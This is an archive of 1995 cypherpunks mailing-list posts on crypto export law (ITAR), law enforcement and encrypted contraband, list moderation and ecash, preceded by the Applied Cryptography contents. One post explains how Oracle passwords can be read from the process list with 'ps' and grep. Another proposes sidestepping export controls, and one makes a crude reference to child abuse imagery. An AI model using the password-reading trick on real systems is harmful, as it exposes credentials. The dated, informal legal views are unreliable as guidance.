          Counterpane Systems, 101 E Minnehaha Parkway,
                    Minneapolis, MN  55419

I need payment by check, in U.S. funds drawn on a U.S. bank.  Or a
postal money order.  Sorry, no credit cards.
*****************************************************************

              APPLIED CRYPTOGRAPHY, SECOND EDITION
                       Table of Contents

((Sections in all capitals are either new or substantially
rewritten.))

Forward by Whitfield Diffie

Preface

Chapter 1:  Foundations
          Terminology; STEGANOGRAPHY; Substitution Ciphers and
          Transposition Ciphers; Simple XOR; One-Time Pads; Computer
          Algorithms; Large Numbers

Part I:  Cryptographic Protocols

Chapter 2:  Protocol Building Blocks
          Introduction to Protocols; Communications using Symmetric
          Cryptography; One-Way Functions; One-Way Hash Functions;
          Communications using Public-Key Cryptography; Digital
          Signatures; Digital Signatures with Encryption; Random and
          Pseudo-Random Sequence Generation

Chapter 3:  Basic Protocols
          Key Exchange; Authentication; AUTHENTICATION AND KEY
          EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE
          PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret
          Splitting; Secret Sharing; Cryptographic Protection of
          Databases

Chapter 4:  Intermediate Protocols
          Timestamping Services; Subliminal Channel; Undeniable
          Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY
          SIGNATURES; Group Signatures; Fail-Stop Digital Signatures;
          Computing with Encrypted Data; Bit Commitment; Fair Coin
          Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing
          Disclosure of Secrets; KEY ESCROW

Chapter 5:  Advanced Protocols
          ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity;
          Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY;
          Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous
          Contract Signing; Digital Certified Mail; Simultaneous
          Exchange of Secrets

Chapter 6:  Esoteric Protocols
          SECURE ELECTIONS; Secure Multiparty Computation; Anonymous
          Message Broadcast; DIGITAL CASH

Part II:  Cryptographic Techniques

Chapter 7:  Key Length
          SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING
          SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS
          AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?;
          Caveat Emptor

Chapter 8:  Key Management
          Generating Keys; NONLINEAR KEYSPACES; Transferring Keys;
          Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys;
          Backup Keys; Compromised Keys; Lifetime of Keys; Destroying
          Keys; Public-Key Key Management

Chapter 9:  Algorithm Types and Modes
          Electronic Codebook Mode; Block Replay; Cipher Block
          Chaining Mode; Stream Ciphers; Self-Synchronizing Stream
          Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers;
          Output-Feedback Mode; Counter Mode; Other Block-Cipher
          Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers
          vs. Stream Ciphers

Chapter 10:  Using Algorithms
          Choosing an Algorithm; Public-Key Cryptography vs. Symmetric
          Cryptography; Encrypting Communications Channels; ENCRYPTING
          DATA FOR STORAGE; Hardware Encryption vs. Software
          Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING
          ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING
          INFORMATION

Part III:  Cryptographic Algorithms

Chapter 11:  Mathematical Background
          Information Theory; Complexity Theory; NUMBER THEORY;
          FACTORING; Prime Number Generation; Discrete Logarithms in a
          Finite Field

Chapter 12:  Data Encryption Standard
          Background; Description of DES; Security of DES; 
          DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN
          CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY?

Chapter 13:  Other Block Algorithms
          Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and
          Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK

Chapter 14:  Still Other Block Algorithms
          GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL;
          RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN;
          USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM

Chapter 15:  Combining Block Algorithms
          DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK
          LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY
          SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS;
          COMBINING MULTIPLE BLOCK ALGORITHMS

Chapter 16:  Pseudo-Random-Sequence Generators and Stream Ciphers
          Linear Congruential Generators; Linear Feedback Shift
          Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM
          CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD;
          NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM
          M; PKZIP

Chapter 17:  Other Stream Ciphers and Real Random-Sequence Generators
          RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM
          CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; 
          Other Stream Ciphers; System-Theoretic Approach to Stream
          Cipher Design; Complexity-Theoretic Approach to Stream
          Cipher Design; Other Approaches to Stream Cipher Design;
          CASCADING MULTIPLE STREAM CIPHERS;  CHOOSING A STREAM
          CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO-
          RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS

Chapter 18:  One-Way Hash Functions
          Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash
          Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash
          Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK
          ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY
          HASH FUNCTION; MESSAGE AUTHENTICATION CODES

Chapter 19:  Public-Key Algorithms
          Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin;
          ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE
          AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS

Chapter 20:  Public-Key Digital Signature Algorithms
          Digital Signature Algorithm (DSA); DSA VARIANTS; GOST
          DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE
          SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other
          Public-Key Algorithms

Chapter 21:  Identification Schemes
          Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING
          IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES

Chapter 22:  Key-Exchange Algorithms
          DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three-
          Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY
          NEGOTIATION; Conference Key Distribution and Secret
          Broadcasting

Chapter 23:  Special Algorithms for Protocols
          Multiple-Key Public-Key Cryptography; Secret Sharing
          Algorithms; Subliminal Channel; Undeniable Digital
          Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with
          Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All-
          or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE
          CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind
          Signatures; Oblivious Transfer; Secure Multiparty
          Computation; Probabilistic Encryption; Quantum Cryptography

Part IV:  The Real World

Chapter 24:  Example Implementations
          IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III;
          Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC
          ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced
          Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY
          (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS;
          UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T
          MODEL 3600 TELEPHONE SECURITY DEVICE

Chapter 25:  Politics
          NATIONAL SECURITY AGENCY; National Computer Security Center;
          National Institute of Standards and Technology; RSA Data
          Security, Inc.; PUBLIC KEY PARTNERS; International
          Association for Cryptologic Research; RACE Integrity
          Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE;
          ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY
          GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S. EXPORT RULES;
          FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues

AFTERWARD BY MATT BLAZE

Source Code
          DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
          WAKE

References





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Fri, 24 Nov 1995 04:04:10 +0800
To: edge@got.net
Subject: Re: crypto for porno users
Message-ID: <199511231945.OAA03659@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi Jay.

>Date: Thu, 23 Nov 1995 00:17:47 -0800
>From: Jay Campbell <edge@got.net>
>Subject: Re: crypto for porno users


>A law
>enforcement team would be stepping onto shaky ground if they were forced to
>transfer illegal images/etc to a suspected trafficer before getting evidence
>from him. Entrapment is an ugly concept.

We've been hearing about such things (using the mails) for some time.  I
don't know how the cops avoided entrapment when they posed as kiddie porn
customers or pedophiles when they were doing the AOL sting.

>>3. Encryption of porn would work against the kind of porn distribution
>>	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
>>	requires that recipients be identified.
>
>Not at all .. a porn distributor could generate a key pair, use part A to
>encode the images, and dessiminate part B thru a variety of outlets -
>publicly posted, sold, passed thru an informal network of like-minded
>netizens...

It's that informal network which is the danger to the pornographer.  The
bigger the network, the closer to certainty that it's been infiltrated.

<begin major soap box issue for me>

Strong authentication via crypto does not create a trusted group.  Trust is
a human:human decision -- subject to severe flaws, none of which are solved
by crypto.  [Can you devise a crypto protocol which will prevent or even
just detect adultery, for example?]  With each additional person, there is
a probability of deception.  For this informal network of yours, deception
by any one participant constitutes a security failure.  If you want to
avoid that, therefore, you need to keep the group *very small*.  If it's
that small, then it's not that interesting a target for LE.

<end major soap box issue for me>

>I would argue the exact opposite - strong crypto would tend to minimize the
>effective take, since there's no guarantee that /anything/ on a perp's
>system will be in the clear. I'll let someone else with a better background
>pound on the 'brute force' section.

Ah -- but that's the point I was making.  Crypto gives the appearance of
security -- whether it's in the informal network or with file storage.
It's often a bank vault door on a cardboard house.  For much of what people
do, especially if there's a large net, it's not rational to expect to
achieve security.  But -- if people have done something to achieve
security, they're likely to be fooled into trusting it to be adequate.

Meanwhile, if *everything* on the perp's machine is encrypted, you're
probably in good shape.  That means he'll be required to type passwords too
often -- so he'll either pick a small one or have some machinery which
stores the password.  Both give cryptanalytic advantages.

This isn't a guarantee that *every* perp will be wide open.  Some won't be.
It means that a bunch of perps will be wide open (out of their own
carelessness -- like the breaks into the Enigma net).

The question you need to look at is not the control-freak question which
Freeh seems concerned with:

A)	the probability that some one perp will manage to hide his data

but rather the SIGINT question:

B)	the expected percentage of perps who will fail to hide their data

Have a good day.

 - Carl




 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 24 Nov 1995 07:46:10 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <Pine.SUN.3.91.951123152756.26616C-100000@viper.law.miami.edu>
Message-ID: <199511232322.PAA00782@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Actually, the application of the law tends to be far more reasonable than 
> non-lawyers believe.  This is one of the hardest things to get law 
> students to believe.  But it is a human process, not a mechancial one.
> 
> If you sell a product legally in the US, taking reasonable precautions to
> observe the ITAR and making clear to your customers what their obligations
> are, you have essentially zero risk.  How do I know this?  Many, many,
> many people do exactly that every day, and none have AFAIK even been
> threatened with prosecution.  This is NOT IMHO how the ITAR restricts 
> intra-US trade.  The ITAR restrict intra-US trade by inducing people to 
> make only exportable products so that they don't have the trouble of 
> supporting two different versions, doing 2 kinds of paperwork, etc.
> 
> OTOH, if you hand software to someone to put on an FTP site, nudge, 
> nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you 
> really are guilty of trying to end-run the ITAR, and they feds may give 
> you a hard time, which after all is their job if you are breaking federal 
> law.
> 
Then suppose you hand software to MIT to put on its export-controlled ftp
site (which would seem to follow your requirements to take reasonable
precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
wink, wink - BUT you know that it's going to be available on major ftp
sites in Europe within a few hours anyway.  The intent to export isn't 
there, but the export occurs anyway.  Is it the intent, or the knowledge
that's important?

Obviously the intent, or the MIT server would be in jail.

So I demonstrate lack of intent to export, by following MIT's model when I
set up my own 'export controlled' ftp server.  Am I safe?  Or do I need
a note from the NSA or somebody to do this?  And if I do need somebody or
something's 'permission', and they refuse to give it, aren't they using
ITAR to restrict the distribution domestically?  Do I have any options in
this case other than to give up?

Or, to bring it down to a practical question, what's stopping Netscape?  How
does Netscape setting up an 'export controlled' ftp site based on the MIT
version lead to one of their executives going to jail?

I have the feeling that we're talking about two different things here - the
law as it's practiced in the courtroom and the law as it's practiced on the
'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
won't help much if the government decides to do a Phil Zimmerman on me.
But I would be interested in your comments.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 24 Nov 1995 04:50:40 +0800
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Spam the Sign!
In-Reply-To: <199511230002.QAA01527@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.951123152756.26616C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain



Actually, the application of the law tends to be far more reasonable than 
non-lawyers believe.  This is one of the hardest things to get law 
students to believe.  But it is a human process, not a mechancial one.

If you sell a product legally in the US, taking reasonable precautions to
observe the ITAR and making clear to your customers what their obligations
are, you have essentially zero risk.  How do I know this?  Many, many,
many people do exactly that every day, and none have AFAIK even been
threatened with prosecution.  This is NOT IMHO how the ITAR restricts 
intra-US trade.  The ITAR restrict intra-US trade by inducing people to 
make only exportable products so that they don't have the trouble of 
supporting two different versions, doing 2 kinds of paperwork, etc.

OTOH, if you hand software to someone to put on an FTP site, nudge, 
nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you 
really are guilty of trying to end-run the ITAR, and they feds may give 
you a hard time, which after all is their job if you are breaking federal 
law.

None of this of course goes to the question of whether the ITAR is 
good/bad or un/constitutional.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 24 Nov 1995 04:57:14 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Disclaimers [WAS Re: Java & Netscape security [NOISE]]
In-Reply-To: <Pa01eD16w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951123153601.26616D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I don't want to ruin a nice thanksgiving by starting a flameware.  So let
me just say that whether a post from a Tron.com address by a person saying
"I don't speak for tron corporation" would be held to be a valid
disclaimer is complicated, fact-driven, and (unless there is a state
statute that speaks to the question) a question of what it was reasonable
for an average reasonable recipient to think under the circumstances. 
Anyone who says "precedent says X" on this subject is oversimplifying. 
For one thing there are 50 states.  They may not all have the same answer
for given facts.... 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Fri, 24 Nov 1995 06:12:43 +0800
To: cme@clark.net (Carl Ellison)
Subject: Re: crypto for porno users
In-Reply-To: <199511231945.OAA03659@clark.net>
Message-ID: <199511232149.PAA21305@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> >A law
> >enforcement team would be stepping onto shaky ground if they were forced to
> >transfer illegal images/etc to a suspected trafficer before getting evidence
> >from him. Entrapment is an ugly concept.
> 
> We've been hearing about such things (using the mails) for some time.  I
> don't know how the cops avoided entrapment when they posed as kiddie porn
> customers or pedophiles when they were doing the AOL sting.

As I recall, the courts have sent the message to the LE community that it's entrapment if they 
entice someone into doing something that they normally wouldn't do.  If you're a kiddie porn dealer, 
and I as a LE officer entice you to sell me some pictures of that cute 8-year-old doing some geezer, 
then that's not entrapment.  If I, on the other hand, try to pressure you (assuming you are a 
law-abiding citizen) into buying such by either misrepresenting the article in question or by 
threatening you with dire consequences if you don't buy, etc. - in other words, forcing or enticing 
you to do something you normally wouldn't do - *that's* entrapment.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLTsaSS9AwzY9LDxAQHZ9AP/ZmGmWQm/cd+osceg0rLj8ZgrPbsXw3hi
5u4RbAjWlazTKydk6JfgDrpfLn+tFr/KhqWE7Zo7wFcgTJcX39PdhuxyO0gnt+lr
BdCjB+qYSei3/TgsoU5XPkMEj+fp22dT1NIxRdDPujDjE1BEz18knQsihngGsZ6X
Iz8TyBe6SIM=
=dJ0W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Fri, 24 Nov 1995 06:13:43 +0800
To: khijol!clark.net!cme@cygnus.com (Carl Ellison)
Subject: Re: crypto for porno users
In-Reply-To: <199511231945.OAA03659@clark.net>
Message-ID: <199511232157.PAA21597@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Strong authentication via crypto does not create a trusted group.  Trust is
> a human:human decision -- subject to severe flaws, none of which are solved
> by crypto.  [Can you devise a crypto protocol which will prevent or even
> just detect adultery, for example?]  With each additional person, there is
> a probability of deception.  For this informal network of yours, deception
> by any one participant constitutes a security failure.  If you want to
> avoid that, therefore, you need to keep the group *very small*.  If it's
> that small, then it's not that interesting a target for LE.

Very true.  Authentication, whether strong or weak, merely says that you are who you say you are -
totally different from this "web of trust" I keep hearing about - and that is *it*.  Do you trust me
any more now than before I started signing my postings? 

> Ah -- but that's the point I was making.  Crypto gives the appearance of
> security -- whether it's in the informal network or with file storage.
> It's often a bank vault door on a cardboard house.  For much of what people
> do, especially if there's a large net, it's not rational to expect to
> achieve security.  But -- if people have done something to achieve
> security, they're likely to be fooled into trusting it to be adequate.
> 
> Meanwhile, if *everything* on the perp's machine is encrypted, you're
> probably in good shape.  That means he'll be required to type passwords too
> often -- so he'll either pick a small one or have some machinery which
> stores the password.  Both give cryptanalytic advantages.

It's well-known that most revelations of encrypted information come from "humint", not from 
mathematical finesse with the encryption scheme.  I especially love Oracle's idea of security - when 
submitting SQL to the Oracle back-end, to automate the process, you feed it your user ID and 
password IN THE CLEAR, ON THE COMMAND LINE.  Any weenie can run "ps -ef/ps -ax" and pipe it to 
grep.  The fact that Larry Ellison wont do anything about it seems to me to be idiocy of the first 
order, and that Oracle doesn't know what it's doing.  It's not even a good database product.  Deity 
only knows why people keep buying it, although that's rather off-topic ;)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLTuOyS9AwzY9LDxAQEuWAP9EU0LgHHAFQgpR+h2D/u9oZmNR3I2z7Cm
qsEZr0Iy84Cu7fH5vIvy5waDx3OZC+Gc1Z2kFydebxl09rTrY88rYIj0Ezp3Mqjk
25oqSlKoDMJNYC2W6cfhVAx6VBDnuExMi4H/R/8pTUepNSBMyc9z0nG0ivkCbTBz
AQd1jcI3lPU=
=Fvaf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Fri, 24 Nov 1995 10:35:43 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <m0tInGT-0008xjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


 Jeff Simmons <jsimmons@goblin.punk.net> said...

>Then suppose you hand software to MIT to put on its export-controlled ftp
>site (which would seem to follow your requirements to take reasonable
>precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>wink, wink - BUT you know that it's going to be available on major ftp
>sites in Europe within a few hours anyway.  The intent to export isn't 
>there, but the export occurs anyway.  Is it the intent, or the knowledge
>that's important?
>
>Obviously the intent, or the MIT server would be in jail.
>
>So I demonstrate lack of intent to export, by following MIT's model when I
>set up my own 'export controlled' ftp server.  Am I safe?  Or do I need
>a note from the NSA or somebody to do this?  And if I do need somebody or
>something's 'permission', and they refuse to give it, aren't they using
>ITAR to restrict the distribution domestically?  Do I have any options in
>this case other than to give up?
>
>Or, to bring it down to a practical question, what's stopping Netscape?  How
>does Netscape setting up an 'export controlled' ftp site based on the MIT
>version lead to one of their executives going to jail?
>
>I have the feeling that we're talking about two different things here - the
>law as it's practiced in the courtroom and the law as it's practiced on the
>'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
>won't help much if the government decides to do a Phil Zimmerman on me.
>But I would be interested in your comments.


I very much agree with the direction you appear to be headed in.  It seems
to me that Netscape should have no problem devising some sort of scenario in
which such a program eventually gets onto the nets, but in a way that is
squeaky clean, at least for THEM.  


In addition, why should they even need to write the encrytion part of their
software IN the US?  It occurs to me that one way to do this might be to
send one of their programmers to a conveniently-located place, such as
Vancouver BC , Montreal Canada, or a few other nearby places, with a great
deal of fanfare, and tell him to "write some crypto."  He does, and brings
it back into the US with him, leaving a copy of it "outside" the country for
international distribution.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 24 Nov 1995 08:20:44 +0800
To: jsimmons@goblin.punk.net
Subject: Re: Spam the Sign!
Message-ID: <9511240003.AA05004@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>  Or do I need
>a note from the NSA or somebody to do this?

Somebody at DoD, department of trade control.  I posted the address and
phone number of the guy here a couple of days ago -- check the archives.
Cool soon, he's leaving early December; expect him to be replaced by
someone clueless.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 24 Nov 1995 04:10:30 +0800
To: "Lynne L. Harrison" <lharrison@mhv.net>
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <9511231639.AA25523@mhv.net>
Message-ID: <Pine.BSD.3.91.951123191604.11385D-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, Lynne L. Harrison wrote:

> <snip>
> >I am inclined to agree with Perry in as much as the volume of posts to
> >the cypherpunks list is greatly increased by reposts of news from
> >other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
> >programs, films, books, talks, etc.  While some of the information
> >posted is interesting, and relevant, some others are less relevant,
> >bordering on noise.
> >
> >The proposal: a separate list for current-event reports/news/reposts.
>
	<attila> someone suggested a new list --moderated. My concern, so
circulated, is that whoever (including backups to cover vacations and 
travel) accepts the responsibility must not thrash any of the code posts. 
My suggestion for making the list effective is to always post to c|punks, 
even if you are on the code list which means "cypherpunks" is still the 
same; who ever is doing the moderating then forwards all the code threads 
to "cypherpunks.moderated"  --you get the best of both worlds.
 
> 1.  Creating a separate list, IMHO, will not stop cross-posts to the list.
> People will merely add one more list to their "cc" line.
>
    	<attila> no doubt. for instance, whoever put c|punks on the 
    ACLUNATL@aol.com biweekly list would just hit both and that one cannot
    be unsubscribed except by the original subscriber. however, that one is
    concise -let's hope we do not get hit with "digitaliberty," "VTW" or any
    of the rest of the prolific slammers/day. 

    	the issue as pointed out above is a separate moderated and 
    non-postable list.
 
> 2.  More importantly, I am troubled with the "this is OUR list" attitude
> that some people have expressed.  Yes, it is a pain when their are
> cross-posts that are completely off-topic but, as Adam correctly points out,
> some are interesting and relevant.
>
	<attila>  but is not the charter of the list "cypherpunks write 
    code" an issue. I don't go as far as Perry on irrelevancy (and Perry 
    breaks his own commandment at will --as do I).

>     One of the tenets proposed by those on this list is free speech.  Most
> of us are on more than one list, so I'm assuming that most of us receive
> 100+ messages a day.  It is irritating to read something that's been crossed
> to c|punks that has nothing to do with this list.  However, it only takes a
> few seconds to arrive at that conclusion and trash the post.

	<attila> that may be true, but it is annoying enough that I use
    'procmail' to waste the lists (and Dr. Fred) before they even make the
    message list.  AND, 'procmail' separates all the mailing list into
    separate folders on the way in --I have not read a newsgroup for
   almost a year unless I am looking for something very specific. 

>     The "they are targeting this list" borders almost on paranoia.  While
> some paranoia is healthy :) - it should not lead to the cry to ban posts
> that have been *deemed* to be inappropriate.
>
	<attila>  any one with a political agenda is going to cross post 
    any list which, in their opinion, might be an audience. the ACLU
    post today is obvious --freedom of speech and congressional action to
    effectively shut down the internet, which certainly falls within our 
    mainstream "interests."

>     I find it interesting that those who express that the net should be a
> community where expression is to be encouraged and defended - until the time
> arrives when such "unsolicited/unwanted/offensive/irrelevant" expression
> knocks on one's front door.
> 
	<attila> this is a valid concern. the last figure I saw for lists 
    was 12,000+.  if some of them do not overlap, where did they find
    12,000 topics worthy of a mail list? as I said, procmail takes care of
    the yeoman's portion, but it is not the be all to end all either. I'm
    not at the point of writing an ai based preprocessor which analyzes
    the content of the folders before invoking my mail reader, but how far
    off is that? information may be key to survival, but...

> Regards -
>   Lynne
> 
	<attila> comment to Lynne: that is the key to life as we know it!

> 
> *******************************************************
> Lynne L. Harrison, Esq.   |     "The key to life:
> Poughkeepsie, New York    |      - Get up;
> E-mail:                   |      - Survive;
> lharrison@mhv.net         |      - Go to bed."
> *******************************************************
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 24 Nov 1995 09:13:57 +0800
To: sameer@c2.org
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <01HXZTB0E3XG8WYILG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sameer@c2.org"  "sameer" 16-NOV-1995 19:01:20.75

>From EALLENSMITH:
> 	I will as soon as someone comes up with a _fully_ private digital
> cash system and starts using it for something. As I understand it, Chaum's
> ecash system is not one (i.e., non-privacy to the sender and of amounts to the
> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
> immediately (if there's a text-based interface).

	ecash provides full payor anonymity. Payee anonymity is
currently not possible, but that is being worked on. 
----------------
	That's what I said; "non-privacy to the sender" is lack of payee
anonymnity. This lack is problematic for me personally in two respects:
	First, there is that, as I have stated, I would like to be a payee at
some point. My likelihood of doing so is decreased if I do not have an
anonymnity option.
	Second, services that I might like to utilize are less likely to be
available if the anonymnity of the provider is not guaranteed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 24 Nov 1995 04:52:39 +0800
To: cypherpunks@toad.com
Subject: Re: How to order Applied Crypto direct from Bruce Schneier
Message-ID: <Pine.3.89.9511232006.A11987-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, Perry E. Metzger wrote:

> Source Code
>           DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
							   ^^
Is that the real A5, or the version that was posted to Usenet some time 
ago ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 00:02:45 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Spam the Sign!
Message-ID: <m0tIpka-000905C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>>  Jeff Simmons <jsimmons@goblin.punk.net> said...
>> 
>> >Then suppose you hand software to MIT to put on its export-controlled ftp
>> >site (which would seem to follow your requirements to take reasonable
>> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>> >wink, wink - BUT you know that it's going to be available on major ftp
>> >sites in Europe within a few hours anyway.  The intent to export isn't 
>> >there, but the export occurs anyway.  Is it the intent, or the knowledge
>> >that's important?
>
>What's important to the government is that the crypto not be exported. 


